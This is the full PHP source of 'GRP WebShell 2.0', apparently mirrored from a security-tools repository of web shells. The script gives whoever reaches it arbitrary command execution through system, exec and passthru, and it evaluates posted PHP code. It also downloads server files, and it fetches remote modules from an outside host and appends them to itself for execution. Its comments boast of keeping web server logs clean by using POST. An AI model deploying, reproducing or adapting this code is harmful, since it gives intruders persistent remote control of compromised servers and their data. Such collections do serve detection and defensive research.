mirror of
https://github.com/BlackArch/webshells
synced 2024-11-25 13:20:25 +00:00
575 lines
16 KiB
PHP
575 lines
16 KiB
PHP
<?php
|
|
|
|
/*
|
|
* GReat's Post (GRP) web shell
|
|
* Shell uses POST queries to send data to the server, so logs on the webserver are absolutely clear ;)
|
|
*
|
|
* Coded by Great (C) 2006.
|
|
* All rights reserved
|
|
*/
|
|
|
|
// Config
|
|
|
|
// Enable BASIC authorization
|
|
$auth = 0;
|
|
// You really don't need to turn it on
|
|
$devel = 0;
|
|
// Allow images?
|
|
$images = 0;
|
|
// If $images=1, set this variable equal to the base URL for the images folder.png & file.png
|
|
$images_url = "http://localhost/";
|
|
// Show errors?
|
|
$errors = 1;
|
|
// Modules path
|
|
$modules_base = "http://cribble.by.ru/grp_mod/";
|
|
// Modules supported
|
|
$modules = array("browse" => "File browser", "mysql" => "MySQL");
|
|
// Script version
|
|
$script_release = "GRP WebShell 2.0 release build 2018 (C)2006,Great";
|
|
|
|
// Authorization
|
|
|
|
$name='63191e4ece37523c9fe6bb62a5e64d45';
|
|
$pass='47ce56ef73da9dec757ef654e6aa1ca1';
|
|
$caption="Enter your login and password";
|
|
if ($auth && (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER'])!=$name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW'])!=$pass))
|
|
{
|
|
header("WWW-Authenticate: Basic realm=\"$caption\"");
|
|
header("HTTP/1.0 401 Unauthorized");
|
|
exit("<h1>Unauthorized access</h1>");
|
|
}
|
|
|
|
if($errors)
|
|
error_reporting(E_ALL&~E_NOTICE);
|
|
else
|
|
error_reporting(0);
|
|
|
|
// Strip slashes
|
|
|
|
if(get_magic_quotes_gpc())
|
|
{
|
|
foreach(array("_POST", "_GET", "_FILES", "_COOKIE") as $ar)
|
|
foreach($GLOBALS[$ar] as $k=>$v)
|
|
$GLOBALS[$ar][$k] = stripslashes($v);
|
|
}
|
|
|
|
// Useful functions
|
|
|
|
// Print post form
|
|
function post_form($name, $params, $a="", $b="")
|
|
{
|
|
static $i=0;
|
|
echo "<form method='post' name='PostActForm$i'>\n";
|
|
foreach($params as $n=>$v)
|
|
echo "<input type='hidden' name='$n' value='$v'>\n";
|
|
echo "$a<a href='javascript:void(0);' onClick='document.PostActForm$i.submit()'>$name</a>$b</form>\n";
|
|
$i++;
|
|
}
|
|
|
|
// Print post form without confirmation link
|
|
function post_empty_form($params)
|
|
{
|
|
static $i=0;
|
|
echo "<form method='post' name='PostEmptyForm$i'>\n";
|
|
foreach($params as $n=>$v)
|
|
echo "<input type='hidden' name='$n' value='$v'>\n";
|
|
echo "</form>\n";
|
|
$i++;
|
|
return $i-1;
|
|
}
|
|
|
|
// Print single confirmation link
|
|
function submit_empty_form($i, $name)
|
|
{
|
|
echo "<a href='javascript:void(0);' onClick='document.PostEmptyForm$i.submit()'>$name</a>";
|
|
}
|
|
|
|
// Print single confirmation link with a confirmation message box
|
|
function confirm_empty_form($i, $name, $msg)
|
|
{
|
|
echo "<a href='javascript:void(0);' onClick='if(confirm(\"$msg\")){document.PostEmptyForm$i.submit()}'>$name</a>";
|
|
}
|
|
|
|
// Redirect to URL $to
|
|
function redirect($to)
|
|
{
|
|
echo "<meta http-equiv=\"refresh\" content=\"0;url='$to'\">";
|
|
}
|
|
|
|
// Get string containing file permissions in the form 'lrwxrwxrwx'
|
|
function filesperms($file)
|
|
{
|
|
$perms = fileperms($file);
|
|
|
|
if (($perms & 0xC000) == 0xC000) {
|
|
// Socket
|
|
$info = 's';
|
|
} elseif (($perms & 0xA000) == 0xA000) {
|
|
// Symbolic Link
|
|
$info = 'l';
|
|
} elseif (($perms & 0x8000) == 0x8000) {
|
|
// Regular
|
|
$info = '-';
|
|
} elseif (($perms & 0x6000) == 0x6000) {
|
|
// Block special
|
|
$info = 'b';
|
|
} elseif (($perms & 0x4000) == 0x4000) {
|
|
// Directory
|
|
$info = 'd';
|
|
} elseif (($perms & 0x2000) == 0x2000) {
|
|
// Character special
|
|
$info = 'c';
|
|
} elseif (($perms & 0x1000) == 0x1000) {
|
|
// FIFO pipe
|
|
$info = 'p';
|
|
} else {
|
|
// Unknown
|
|
$info = 'u';
|
|
}
|
|
|
|
// Owner
|
|
$info .= (($perms & 0x0100) ? 'r' : '-');
|
|
$info .= (($perms & 0x0080) ? 'w' : '-');
|
|
$info .= (($perms & 0x0040) ?
|
|
(($perms & 0x0800) ? 's' : 'x' ) :
|
|
(($perms & 0x0800) ? 'S' : '-'));
|
|
|
|
// Group
|
|
$info .= (($perms & 0x0020) ? 'r' : '-');
|
|
$info .= (($perms & 0x0010) ? 'w' : '-');
|
|
$info .= (($perms & 0x0008) ?
|
|
(($perms & 0x0400) ? 's' : 'x' ) :
|
|
(($perms & 0x0400) ? 'S' : '-'));
|
|
|
|
// World
|
|
$info .= (($perms & 0x0004) ? 'r' : '-');
|
|
$info .= (($perms & 0x0002) ? 'w' : '-');
|
|
$info .= (($perms & 0x0001) ?
|
|
(($perms & 0x0200) ? 't' : 'x' ) :
|
|
(($perms & 0x0200) ? 'T' : '-'));
|
|
return $info;
|
|
}
|
|
|
|
// Get string contaning file modification time
|
|
function filesmtime($file)
|
|
{
|
|
return date ("d M Y H:i:s", filemtime($file));
|
|
}
|
|
|
|
function headers()
|
|
{
|
|
return "{$_SERVER['REQUEST_METHOD']} {$_SERVER['PHP_SELF']} {$_SERVER['SERVER_PROTOCOL']}\\n
|
|
Accept: {$_SERVER['HTTP_ACCEPT']}\\n
|
|
Accept-Charset: {$_SERVER['HTTP_ACCEPT_CHARSET']}\\n
|
|
Accept-Encoding: {$_SERVER['HTTP_ACCEPT_ENCODING']}\\n
|
|
Accept-Language: {$_SERVER['HTTP_ACCEPT_LANGUAGE']}\\n
|
|
Cache-Control: {$_SERVER['HTTP_CACHE_CONTROL']}\\n
|
|
Connection: {$_SERVER['HTTP_CONNECTION']}\\n
|
|
Host: {$_SERVER['HTTP_HOST']}\\n
|
|
User-Agent: {$_SERVER['HTTP_USER_AGENT']}\\n
|
|
";
|
|
}
|
|
|
|
if($_POST['act']=='toolz' && $_POST['subact']=='phpinfo')
|
|
die(phpinfo());
|
|
|
|
if($_POST['act']=='downfile')
|
|
{
|
|
$curdir = $_POST['curdir'];
|
|
$file = $_POST['file'];
|
|
|
|
if(!file_exists($curdir.'/'.$file))
|
|
die("Cannot find file ".$curdir.'/'.$file);
|
|
if(!is_file($curdir.'/'.$file))
|
|
die($curdir.'/'.$file." is not a regular file");
|
|
|
|
Header("Content-Type: application/x-octet-stream");
|
|
Header("Content-Disposition: attachement;filename=".$file);
|
|
|
|
die(join('', file($curdir.'/'.$file)));
|
|
}
|
|
|
|
if($_POST['act']=='preview')
|
|
{
|
|
chdir($_POST['curdir']);
|
|
if(!file_exists($_POST['file']))
|
|
die("Can't find file");
|
|
$p=explode(".",$_POST['file']);
|
|
$ext=strtolower($p[count($p)-1]);
|
|
if(in_array($ext, array('png','jpg','jpeg','bmp','gif','tiff','pcx')))
|
|
Header("Content-Type: image/$ext");
|
|
elseif(in_array($ext, array('htm', 'html','plg')))
|
|
Header("Content-Type: text/html");
|
|
elseif(in_array($ext, array('php')))
|
|
{ include($_POST['file']); die;}
|
|
else
|
|
Header("Content-Type: text/plain");
|
|
@readfile($_POST['file']);
|
|
die;
|
|
}
|
|
|
|
//---------------------------------
|
|
// Headers
|
|
//---------------------------------
|
|
?>
|
|
<html>
|
|
<head>
|
|
<title><?php echo $script_release;?></title>
|
|
<style type='text/css'>
|
|
A { text-decoration: none; color: white }
|
|
</style>
|
|
</head>
|
|
<body bgcolor='black' vlink='blue' alink='blue' link='blue' text='white'>
|
|
<noscript><br><br><br><h1 align='center'><font color='red'>You need JavaScript to be enabled to run this page!</font></h1><br><br><br></noscript>
|
|
<?php // Navigation ?>
|
|
<center>
|
|
<table border=0 width=100%><tr><td><table border=0><tr>
|
|
<form method='post' name='main_empty_form'><input type='hidden' name='act'><input type='hidden' name='curdir'><input type='hidden' name='file'><input type='hidden' name='subact'></form>
|
|
<?php
|
|
echo "<td><b>";
|
|
post_form("Shell", array(), "", " |");
|
|
|
|
$mod_loaded = array();
|
|
foreach($modules as $module=>$name)
|
|
{
|
|
if(function_exists("mod_".$module))
|
|
{
|
|
echo "</b><td><b>";
|
|
post_form($name, array("act" => $module), "", " |");
|
|
$mod_loaded[] = $module;
|
|
}
|
|
}
|
|
|
|
echo "</b><td><b>";
|
|
post_form("Toolz", array("act" => "toolz"));
|
|
|
|
echo "</table><td align=right width=50%> <table style='border: 1px solid' width=100%><tr><td>";
|
|
echo "<b>Modules installed:</b> ";
|
|
$first = 1;
|
|
foreach($mod_loaded as $module)
|
|
{
|
|
if(!$first)
|
|
echo ", ";
|
|
if($module==$_POST['act'])
|
|
echo "<b>".$module."</b>";
|
|
else
|
|
echo $module;
|
|
$first=0;
|
|
}
|
|
if($first==1)
|
|
echo "None";
|
|
?>
|
|
<td align=right>
|
|
<?php
|
|
if(file_exists("grp_repair.php"))
|
|
echo "<input type='button' value='Repair' onClick='window.top.location.href=\"grp_repair.php\";' /><input type='button' value='Delete Repair' onClick='window.top.location.href=\"grp_repair.php?delete\";' /> ";
|
|
?>
|
|
<input type='button' value='Load more...' onClick='document.main_empty_form.act.value="load_modules";document.main_empty_form.submit();' />
|
|
</table></table>
|
|
</center>
|
|
<p>
|
|
<table border=0>
|
|
<tr><td>
|
|
<table style='border: 1px solid' cellspacing=5>
|
|
<tr><td colspan=2 align='center'><b>Server information</b>
|
|
<tr><td>
|
|
<?php
|
|
$os = "unk";
|
|
$safe = @ini_get("safe_mode");
|
|
|
|
if($safe==1)
|
|
{
|
|
echo "<b>Safe Mode</b> <td>On<tr><td>";
|
|
}
|
|
else
|
|
{
|
|
echo "<b>Operating system</b> <td>";
|
|
$ver = exec("ver");
|
|
if(substr($ver, 0, 9) == "Microsoft")
|
|
{
|
|
echo $ver;
|
|
$os = "win";
|
|
}
|
|
else
|
|
{
|
|
$id = exec("id");
|
|
if(substr($id, 0, 3) == "uid")
|
|
{
|
|
echo exec("uname -srn");
|
|
$os = "nix";
|
|
}
|
|
else
|
|
echo "Unknown, not a Windows ";
|
|
}
|
|
|
|
if($os == "nix")
|
|
{
|
|
echo "<tr><td><b>id<b> <td>".exec("id")."</tr>";
|
|
}
|
|
}
|
|
echo "<tr><td><b>Server software</b> <td>{$_SERVER['SERVER_SOFTWARE']}";
|
|
|
|
if($os == "nix")
|
|
{
|
|
$pwd = exec("pwd");
|
|
$defcmd = "ls -liaF";
|
|
}
|
|
elseif($os == "win")
|
|
{
|
|
$pwd = exec("cd");
|
|
$defcmd = "dir";
|
|
}
|
|
|
|
if(empty($pwd))
|
|
$pwd = getcwd();
|
|
|
|
?>
|
|
</table>
|
|
<td>
|
|
<table style='border: 1px solid' cellspacing=5>
|
|
<tr><td colspan=2 align='center'><b>Client information</b>
|
|
<tr><td><b>Client's IP</b> <td><a href="javascript:alert('Host: <?php echo gethostbyname($_SERVER['REMOTE_ADDR']); ?>');"><?php echo $_SERVER['REMOTE_ADDR'];?></a>
|
|
<tr><td><b>Client's browser</b> <td><a href="javascript: alert('HTTP Headers:\n\n<?php echo headers(); ?>');"><?php echo htmlspecialchars($_SERVER['HTTP_USER_AGENT']);?></a>
|
|
</table>
|
|
</table>
|
|
<p>
|
|
<?php
|
|
//---------------------------------
|
|
// Parse parameters. Initializing.
|
|
//---------------------------------
|
|
|
|
// Register globals
|
|
if (ini_get('register_globals') != '1')
|
|
{
|
|
if (!empty($HTTP_POST_VARS))
|
|
extract($HTTP_POST_VARS);
|
|
|
|
if (!empty($HTTP_GET_VARS))
|
|
extract($HTTP_GET_VARS);
|
|
|
|
if (!empty($HTTP_SERVER_VARS))
|
|
extract($HTTP_SERVER_VARS);
|
|
}
|
|
|
|
//---------------------------------
|
|
// Select action
|
|
//---------------------------------
|
|
|
|
|
|
// Toolz
|
|
if($_POST['act'] == 'toolz')
|
|
{
|
|
?>
|
|
<h3>Tools</h3>
|
|
<?php
|
|
$n1 = post_empty_form(array("act" => "toolz", "subact" => "phpinfo"));
|
|
$n2 = post_empty_form(array("act" => "toolz", "subact" => "phpcode"));
|
|
?>
|
|
<ul>
|
|
<li><?php submit_empty_form($n1, "Phpinfo"); ?>
|
|
<li><?php submit_empty_form($n2, "Evaluate php code"); ?>
|
|
</ul>
|
|
<?php
|
|
|
|
if($_POST['subact'] == "phpcode")
|
|
{
|
|
if(!isset($_POST['code']))
|
|
$_POST['code'] = 'print_r($_SERVER);';
|
|
echo "<br /><form method='post' name='phpcode'>
|
|
<input type='hidden' name='act' value='toolz'>
|
|
<input type='hidden' name='subact' value='phpcode'>
|
|
<input type='checkbox' name='pre'".(($_POST['pre']=="on")?" checked":"").">
|
|
<a href=\"javascript:void(0);\" onClick=\"document.phpcode.pre.checked=!document.phpcode.pre.checked\">Append <pre> tags</a><br>
|
|
<textarea name='code' cols=70 rows=20>{$_POST['code']}</textarea>
|
|
<br />
|
|
<input type='submit' name='go' value='Eval'>
|
|
</form>";
|
|
if(isset($_POST['go']))
|
|
{
|
|
echo "<p>Result is:<br />";
|
|
if($_POST['pre']=="on")
|
|
{
|
|
echo "<pre>";
|
|
eval($_POST['code']);
|
|
echo "</pre>";
|
|
}
|
|
else
|
|
echo eval($_POST['code']);
|
|
}
|
|
|
|
}
|
|
?>
|
|
</ul>
|
|
<?php
|
|
}
|
|
|
|
elseif(function_exists("mod_".$_POST['act']))
|
|
{
|
|
eval("mod_".$_POST['act']."();");
|
|
}
|
|
|
|
elseif($_POST['act']=="load_modules")
|
|
{
|
|
echo "<h3>Module loader</h3>";
|
|
if($_POST['subact']=='autoload')
|
|
{
|
|
$mod = join('', file($modules_base."mod_".$_POST['module'].".txt"));
|
|
if($mod===false)
|
|
die("Module is unavailable");
|
|
//echo "Module:<br><textarea cols=50 rows=10 readonly>".htmlspecialchars($mod)."</textarea>";
|
|
$parts = explode('/', $_SERVER['PHP_SELF']);
|
|
$name = $parts[count($parts)-1];
|
|
|
|
// Backup
|
|
copy($name, "~".$name);
|
|
|
|
$f = fopen("grp_repair.php", "w");
|
|
if($f)
|
|
{
|
|
$crlf = "\r\n";
|
|
fwrite($f, '<?php'.$crlf.'$name="'.$name.'";'.$crlf.'if($_SERVER[QUERY_STRING]=="delete") {unlink("grp_repair.php");unlink("~".$name);}else{'.$crlf.'unlink($name);'.$crlf.'rename("~".$name, $name);'.$crlf.'unlink("grp_repair.php");}'.$crlf.'?>'."<meta http-equiv=\"refresh\" content=\"0;url='$name'\">");
|
|
fclose($f);
|
|
$repair=1;
|
|
}
|
|
else $repair=0;
|
|
|
|
$sh = fopen($name, "a+") or die("Can't open ".$name." to append module");;
|
|
fwrite($sh, $mod);
|
|
fclose($sh);
|
|
echo "<b><font color='green'>Module installed successfully</font></b><br /><b>WARNING!</b> Shell file has been backuped. If you'll have problems with installed module, you can ";
|
|
if($repair)
|
|
echo "run 'grp_repair.php' to forget changes";
|
|
else
|
|
echo "backup file manually from '~".$name."' (shell was unable to create self-repairing module)";
|
|
echo "<br /><small>You'll be automatically redirected in 3 seconds</small><meta http-equiv=\"refresh\" content=\"3;url=''\">";
|
|
}
|
|
|
|
else
|
|
{
|
|
echo "<b>Supported modules are</b>: ";
|
|
$first = 1;
|
|
foreach($modules as $module=>$name)
|
|
{
|
|
if(!$first)
|
|
echo ", ";
|
|
echo $name." (".$module.")";
|
|
$first=0;
|
|
}
|
|
if($first==1)
|
|
echo "None";
|
|
echo "<br /><b>Modules base load URL</b>: $modules_base<p><font color='gray'><b>Modules can be installed:</b></font>
|
|
(<font color='green'>Ready</font>, <font color='red'>Failure</font>)<br />";
|
|
foreach($modules as $module=>$name)
|
|
{
|
|
$mod_form[$module] = post_empty_form(array('act' => 'load_modules', 'subact' => 'autoload', 'module' => $module));
|
|
}
|
|
echo "<table border=0>";
|
|
foreach($modules as $module=>$name)
|
|
{
|
|
$pre = "<font color='green'>";
|
|
$post = "</font>";
|
|
$mod = @join('', @file($modules_base."mod_".$module.".txt"));
|
|
if(!preg_match("#function mod_#i", $mod))
|
|
$pre = "<font color='red'>";
|
|
|
|
echo "<tr><td>".$pre.$name." (".$module.")".$post."<td><a href='".$modules_base."mod_".$module.".txt' target=_blank>[SOURCE]</a><td>";
|
|
|
|
if(function_exists("mod_".$module))
|
|
echo "<font color='gray'>[ALREADY INSTALLED]</font>";
|
|
elseif($pre == "<font color='green'>")
|
|
submit_empty_form($mod_form[$module], "[INSTALL]");
|
|
else
|
|
echo "<font color='gray'>[CAN'T INSTALL]</font>";
|
|
echo "</tr>";
|
|
}
|
|
echo "</table>";
|
|
}
|
|
}
|
|
|
|
// Shell
|
|
else
|
|
{
|
|
// First we check if there has been asked for a working directory
|
|
if (!empty($work_dir)) {
|
|
// A workdir has been asked for
|
|
if (!empty($command)) {
|
|
if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
|
|
// We try and match a cd command
|
|
if ($regs[1][0] == '/') {
|
|
$new_dir = $regs[1]; // 'cd /something/...'
|
|
} else {
|
|
$new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
|
|
}
|
|
if (file_exists($new_dir) && is_dir($new_dir)) {
|
|
$work_dir = $new_dir;
|
|
}
|
|
unset($command);
|
|
}
|
|
}
|
|
}
|
|
|
|
unset($curdir);
|
|
if($safe == 1)
|
|
{
|
|
die("<font color='red'><b>Safe mode is turned On! Command line is unavailable</b></font>");
|
|
}
|
|
|
|
if(isset($_POST["curdir"]))
|
|
$curdir = $_POST["curdir"];
|
|
else
|
|
$curdir = $pwd;
|
|
if($os == "win")
|
|
$curdir = str_replace("/", "\\", $curdir);
|
|
?>
|
|
<form name="execform" method="post">
|
|
<table border=0>
|
|
<tr><td>Command: <td><input type="text" name="command" size="60" value="<?php echo ($_POST["command"]=="")?$defcmd:$_POST["command"];?>">
|
|
<td><a href="#" onClick="document.execform.command.value='<?php echo $defcmd;?>'">Set default [<?php echo $defcmd; ?>]</a>
|
|
<tr><td><a href="#" onClick="document.execform.stderr.checked=!document.execform.stderr.checked">Disable stderr-grabbing?</a><td><input type="checkbox" name="stderr"<?php echo ($_POST["stderr"]=="on")?" checked":"";?>>
|
|
<tr><td>Working directory:<td><input type="text" name="curdir" size="60" value="<?php echo $curdir;?>">
|
|
<td><a href="#" onClick="document.execform.curdir.value='<?php echo addslashes($pwd);?>'">Restore as home directory [<?php echo htmlspecialchars($pwd); ?>]</a>
|
|
<tr><td colspan=2><input name="submit_btn" type="submit" value="Execute Command">
|
|
</table>
|
|
</form>
|
|
<textarea cols="80" rows="29" readonly>
|
|
<?php
|
|
function excmd($cmd)
|
|
{
|
|
if(function_exists("system"))
|
|
{ system($cmd); return true; }
|
|
if(function_exists("exec"))
|
|
{ exec($cmd, $var); echo join("\n", $var); return true; }
|
|
if(function_exists("passthru"))
|
|
{ passthru($cmd); return true; }
|
|
return false;
|
|
}
|
|
if (!empty($command)) {
|
|
if (!$stderr)
|
|
$command .= " 2>&1";
|
|
if($os == "nix")
|
|
excmd("cd $curdir; $command");
|
|
elseif($os == "win")
|
|
excmd("cd $curdir & $command");
|
|
elseif($os == "unk")
|
|
{
|
|
chdir($curdir);
|
|
excmd($command);
|
|
}
|
|
}
|
|
?>
|
|
</textarea>
|
|
</form>
|
|
<script language="JavaScript" type="text/javascript">
|
|
document.execform.command.focus();
|
|
</script>
|
|
<?php
|
|
}
|
|
|
|
//---------------------------------
|
|
// Footer
|
|
//---------------------------------
|
|
?>
|
|
</body>
|
|
</html>
|
|
|
|
<?php // Is it really very interesting? :) ?>
|